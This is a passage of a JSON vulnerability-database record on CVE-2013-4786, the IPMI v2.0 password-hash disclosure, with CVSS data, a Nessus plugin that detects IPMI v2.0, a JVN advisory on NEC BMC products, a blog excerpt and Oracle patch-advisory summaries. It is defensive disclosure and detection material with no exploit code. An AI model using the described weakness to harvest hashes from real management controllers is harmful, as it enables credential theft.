"2013-07-08T22:55:00", "type": "cve", "title": "CVE-2013-4786", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2020-10-29T00:15:00", "cpe": ["cpe:/a:intel:intelligent_platform_management_interface:2.0", "cpe:/o:oracle:fujitsu_m10_firmware:2290"], "id": "CVE-2013-4786", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4786", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:oracle:fujitsu_m10_firmware:2290:*:*:*:*:*:*:*", "cpe:2.3:a:intel:intelligent_platform_management_interface:2.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-09-13T02:47:20", "description": "The remote host supports IPMI v2.0. The Intelligent Platform Management Interface (IPMI) protocol is affected by an information disclosure vulnerability due to the support of RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication. A remote attacker can obtain password hash information for valid user accounts via the HMAC from a RAKP message 2 response from a BMC.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-12-18T00:00:00", "type": "nessus", "title": "IPMI v2.0 Password Hash Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2020-06-12T00:00:00", "cpe": [], "id": "IPMI_PASSHASH_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/80101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80101);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2013-4786\");\n script_bugtraq_id(61076);\n\n script_name(english:\"IPMI v2.0 Password Hash Disclosure\");\n script_summary(english:\"Checks if the server supports IPMI v2.0.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host supports IPMI version 2.0.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host supports IPMI v2.0. The Intelligent Platform\nManagement Interface (IPMI) protocol is affected by an information\ndisclosure vulnerability due to the support of RMCP+ Authenticated\nKey-Exchange Protocol (RAKP) authentication. A remote attacker can\nobtain password hash information for valid user accounts via the HMAC\nfrom a RAKP message 2 response from a BMC.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://fish2.com/ipmi/remote-pw-cracking.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is no patch for this vulnerability; it is an inherent problem\nwith the specification for IPMI v2.0. Suggested mitigations include :\n\n - Disabling IPMI over LAN if it is not needed.\n\n - Using strong passwords to limit the successfulness of\n off-line dictionary attacks.\n\n - Using Access Control Lists (ACLs) or isolated networks\n to limit access to your IPMI management interfaces.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ipmi_supported_versions.nbin\");\n script_require_ports(\"Services/udp/asf-rmcp\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude(\"global_settings.inc\");\ninclude('misc_func.inc');\n\nvar ipmi_channels, ipmi_v2_enabled;\n\nport = get_service(svc:\"asf-rmcp\", ipproto:\"udp\", exit_on_fail:TRUE);\n\nipmi_channels = get_kb_list(\"ipmi/\"+port+\"/channels/*/v2.0\");\n\nif (isnull(ipmi_channels ))\n{\n audit(AUDIT_NOT_DETECT, \"IPMI\", port);\n}\n\nipmi_v2_enabled = FALSE;\nforeach ipmi_channel_v2_enabled (ipmi_channels)\n{\n if (ipmi_channel_v2_enabled == 1)\n {\n ipmi_v2_enabled = TRUE;\n break;\n }\n}\n\nif (!ipmi_v2_enabled)\n{\n audit(AUDIT_LISTEN_NOT_VULN, \"IPMI\", port);\n}\n\n# Report our findings.\nreport = '';\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus detected that the remote server has IPMI v2.0 implemented.'+\n '\\nRemote unauthenticated users will be able to get password hashes'+\n '\\nfor valid users.'+\n '\\n';\n}\n\nsecurity_hole(port:port, proto:\"udp\", extra:report);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "jvn": [{"lastseen": "2021-12-28T23:20:13", "description": "In Intelligent Platform Management Interface (IPMI) v1.5, Remote Management Control Protocol (RMCP) to access BMC through LAN is prescribed. \n \nMultiple NEC products which conduct RMCP access using IPMI over LAN contain an issue in implementations of the BMC firmware and when accessing BMC through RMCP using LAN, unauthorized session may be established.\n\n ## Impact\n\nA logged-in remote attacker may obtain/modify BMC setting information, obtain monitoring information or reboot/shut down the product.\n\n ## Solution\n\n**Do not use IPMI over LAN at products** \nIt is recommended to stop using IPMI over LAN in the products. \nIPMI 2.0 contains a known vulnerability (CVE-2013-4786) where the password hashes may be obtained. Therefore, disable IPMI over LAN in the products to avoid the effects of this vulnerability. \nAccording to the developer, IPMI over LAN is enabled by default in the affected products, but would not function if LAN cable is not connected to BNC LAN port. \n \n**Apply a Workaround** \nIf the product's IPMI over LAN must be used, apply following workaround to mitigate the effects of this vulnerability. \n\n * Apply BMC firmware Rev1.10 or later, which this vulnerability is addressed, and use the product only in a safe intranet protected by a firewall and do not connect the BMC to the Internet.\n\n ## Products Affected\n\nThe following products which Baseboard Management Controller (BMC) firmware Rev1.09 and earlier is applied, are affected. \n\n * Express5800/T110j\n * Express5800/T110j-S\n * Express5800/T110j (2nd-Gen)\n * Express5800/T110j-S (2nd-Gen)\n * iStorage NS100Ti\n * Express5800/GT110j\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-04T00:00:00", "type": "jvn", "title": "JVN#38752718: Multiple NEC Products vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786", "CVE-2020-5633"], "modified": "2021-01-12T00:00:00", "id": "JVN:38752718", "href": "http://jvn.jp/en/jp/JVN38752718/index.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "avleonov": [{"lastseen": "2020-02-23T21:33:45", "description": "I've just read [a nice article about Vulnerability Management](<https://habr.com/ru/company/acribia/blog/487780/>) in the [Acribia](<https://en.acribia.ru>) blog (in Russian). An extract and my _comments_ below. \n\nIn the most cases Vulnerability Management is not about Vulnerabilities, but about Management. Just filtering the most critical vulnerabilities is not enough.\n\nPractical Cases:\n\n 1. \"Oh, yes, we know ourselves that that everything is bad!\" - [CVE-2013\u22124786](<https://nvd.nist.gov/vuln/detail/CVE-2013-4786>) IPMI password hash disclosure on > 500 servers. Customer just accepted the risks, Acribia proposed an effective workaround (unbrutable user IDs and passwords)._ It's often hard to figure out right remediation measures and implement them. Someone should do it!_\n 2. \"We can download OpenVAS without your help!\" - [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) Cisco Smart Install RCE on 350 hosts. Vulnerability detection rules of several Vulnerability Scanners were not good enough to detect this vulnerability. _Do not rely on scanners, know how they work and their limitations._\n 3. \"If the attackers wanted to hack us, they would have already done it!\" - [CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>) ([MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) Windows SMB RCE on domain controller and several other critical servers. Vulnerability was detected in infrastructure several times, the remediation was agreed with the management, but it was ignored by responsible IT guys. As a result, during the next successful [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>)-like malware attack the servers, including the DC were destroyed. _Vulnerability Management is about the willingness to patch anything, very quickly, as often as required. Otherwise, it makes no sense._\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T13:46:54", "type": "avleonov", "title": "Is Vulnerability Management more about Vulnerabilities or Management?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786", "CVE-2017-0144", "CVE-2018-0171"], "modified": "2020-02-11T13:46:54", "id": "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "href": "http://feedproxy.google.com/~r/avleonov/~3/HjLo7EOJYWA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:53:03", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 136 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n** Please note that on March 23, 2016, Oracle released [Security Alert for Java SE for CVE-2016-0636](<http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0636-2949497.html>). Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced for CVE-2016-0636. **\n\nPlease also note that the vulnerabilities in this Critical Patch Update are scored using versions 3.0 and 2.0 of Common Vulnerability Scoring Standard (CVSS). Future Critical Patch Updates and Security Alerts will be scored using CVSS version 3.0 only.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "edition": 2, "cvss3": {}, "published": "2016-04-19T00:00:00", "type": "oracle", "title": "cpuapr2016v3", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-4000", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0681", "CVE-2016-0641", "CVE-2014-3566", "CVE-2016-3436", "CVE-2011-4461", "CVE-2016-0697", "CVE-2015-1793", "CVE-2015-7236", "CVE-2015-3197", "CVE-2016-3457", "CVE-2016-3417", "CVE-2016-3441", "CVE-2016-3426", "CVE-2016-0699", "CVE-2016-0407", "CVE-2016-0623", "CVE-2016-0705", "CVE-2016-3423", "CVE-2013-4786", "CVE-2016-3418", "CVE-2016-0695", "CVE-2015-7181", "CVE-2015-1789", "CVE-2015-1794", "CVE-2016-3427", "CVE-2016-0682", "CVE-2016-2047", "CVE-2015-3195", "CVE-2016-0798", "CVE-2016-0677", "CVE-2014-3576", "CVE-2016-0649", "CVE-2016-0698", "CVE-2016-3462", "CVE-2016-0639", "CVE-2016-0696", "CVE-2016-0669", "CVE-2016-0692", "CVE-2016-0799", "CVE-2016-0694", "CVE-2016-3449", "CVE-2016-0469", "CVE-2016-0662", "CVE-2016-0680", "CVE-2016-0678", "CVE-2015-3194", "CVE-2015-7501", "CVE-2015-3253", "CVE-2016-3463", "CVE-2016-0646", "CVE-2016-3420", "CVE-2016-3422", "CVE-2016-3416", "CVE-2016-0674", "CVE-2016-0668", "CVE-2016-3431", "CVE-2015-3238", "CVE-2016-0797", "CVE-2015-7182", "CVE-2016-0702", "CVE-2015-2808", "CVE-2016-3419", "CVE-2015-7575", "CVE-2016-3456", "CVE-2014-2532", "CVE-2016-0679", "CVE-2016-0685", "CVE-2015-3196", "CVE-2016-0666", "CVE-2015-2721", "CVE-2015-3193", "CVE-2016-0479", "CVE-2016-0659", "CVE-2016-0636", "CVE-2016-0643", "CVE-2016-3454", "CVE-2016-0672", "CVE-2016-0642", "CVE-2016-3428", "CVE-2016-3443", "CVE-2016-3460", "CVE-2016-0675", "CVE-2016-0687", "CVE-2016-0652", "CVE-2016-0640", "CVE-2016-0700", "CVE-2015-7183", "CVE-2016-0638", "CVE-2016-0408", "CVE-2016-3442", "CVE-2016-0651", "CVE-2016-3461", "CVE-2016-0673", "CVE-2016-3447", "CVE-2016-0690", "CVE-2016-0665", "CVE-2016-0800", "CVE-2016-0655", "CVE-2016-0657", "CVE-2016-0684", "CVE-2016-3425", "CVE-2016-0468", "CVE-2013-2566", "CVE-2016-3464", "CVE-2015-1790", "CVE-2016-0691", "CVE-2016-3438", "CVE-2016-0686", "CVE-2016-3435", "CVE-2016-3434", "CVE-2016-0654", "CVE-2016-3455", "CVE-2016-3421", "CVE-2016-3465", "CVE-2016-3439", "CVE-2016-3429", "CVE-2016-0658", "CVE-2016-0650", "CVE-2016-0644", "CVE-2016-3437", "CVE-2016-0676", "CVE-2016-0656", "CVE-2016-0667", "CVE-2016-0683", "CVE-2016-0653", "CVE-2016-0671", "CVE-2016-0661", "CVE-2016-3466", "CVE-2016-0693", "CVE-2015-7547", "CVE-2015-4923", "CVE-2016-0688", "CVE-2016-0689", "CVE-2016-0663"], "modified": "2016-12-20T00:00:00", "id": "ORACLE:CPUAPR2016V3-2985753", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:27", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 136 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n**Please note that on March 23, 2016, Oracle released Security Alert for Java SE for CVE-2016-0636 . Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced for CVE-2016-0636.**\n\nPlease also note that the vulnerabilities in this Critical Patch Update are scored using versions 3.0 and 2.0 of Common Vulnerability Scoring Standard (CVSS). Future Critical Patch Updates and Security Alerts will be scored using CVSS version 3.0 only.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2016", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4461", "CVE-2013-2566", "CVE-2013-4786", "CVE-2014-2532", "CVE-2014-3566", "CVE-2014-3576", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1793", "CVE-2015-1794", "CVE-2015-2721", "CVE-2015-2808", "CVE-2015-3193", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3238", "CVE-2015-3253", "CVE-2015-4000", "CVE-2015-4923", "CVE-2015-7181", "CVE-2015-7182", "CVE-2015-7183", "CVE-2015-7236", "CVE-2015-7501", "CVE-2015-7547", "CVE-2015-7575", "CVE-2016-0407", "CVE-2016-0408", "CVE-2016-0468", "CVE-2016-0469", "CVE-2016-0479", "CVE-2016-0623", "CVE-2016-0636", "CVE-2016-0638", "CVE-2016-0639", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0652", "CVE-2016-0653", "CVE-2016-0654", "CVE-2016-0655", "CVE-2016-0656", "CVE-2016-0657", "CVE-2016-0658", "CVE-2016-0659", "CVE-2016-0661", "CVE-2016-0662", "CVE-2016-0663", "CVE-2016-0665", "CVE-2016-0666", "CVE-2016-0667", "CVE-2016-0668", "CVE-2016-0669", "CVE-2016-0671", "CVE-2016-0672", "CVE-2016-0673", "CVE-2016-0674", "CVE-2016-0675", "CVE-2016-0676", "CVE-2016-0677", "CVE-2016-0678", "CVE-2016-0679", "CVE-2016-0680", "CVE-2016-0681", "CVE-2016-0682", "CVE-2016-0683", "CVE-2016-0684", "CVE-2016-0685", "CVE-2016-0686", "CVE-2016-0687", "CVE-2016-0688", "CVE-2016-0689", "CVE-2016-0690", "CVE-2016-0691", "CVE-2016-0692", "CVE-2016-0693", "CVE-2016-0694", "CVE-2016-0695", "CVE-2016-0696", "CVE-2016-0697", "CVE-2016-0698", "CVE-2016-0699", "CVE-2016-0700", "CVE-2016-0702", "CVE-2016-0705", "CVE-2016-0797", "CVE-2016-0798", "CVE-2016-0799", "CVE-2016-0800", "CVE-2016-2047", "CVE-2016-3416", "CVE-2016-3417", "CVE-2016-3418", "CVE-2016-3419", "CVE-2016-3420", "CVE-2016-3421", "CVE-2016-3422", "CVE-2016-3423", "CVE-2016-3425", "CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3428", "CVE-2016-3429", "CVE-2016-3431", "CVE-2016-3434", "CVE-2016-3435", "CVE-2016-3436", "CVE-2016-3437", "CVE-2016-3438", "CVE-2016-3439", "CVE-2016-3441", "CVE-2016-3442", "CVE-2016-3443", "CVE-2016-3447", "CVE-2016-3449", "CVE-2016-3454", "CVE-2016-3455", "CVE-2016-3456", "CVE-2016-3457", "CVE-2016-3460", "CVE-2016-3461", "CVE-2016-3462", "CVE-2016-3463", "CVE-2016-3464", "CVE-2016-3465", "CVE-2016-3466"], "modified": "2016-12-20T00:00:00", "id": "ORACLE:CPUAPR2016V3", "href": "https://www.oracle.com/security-alerts/cpuapr2016v3.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}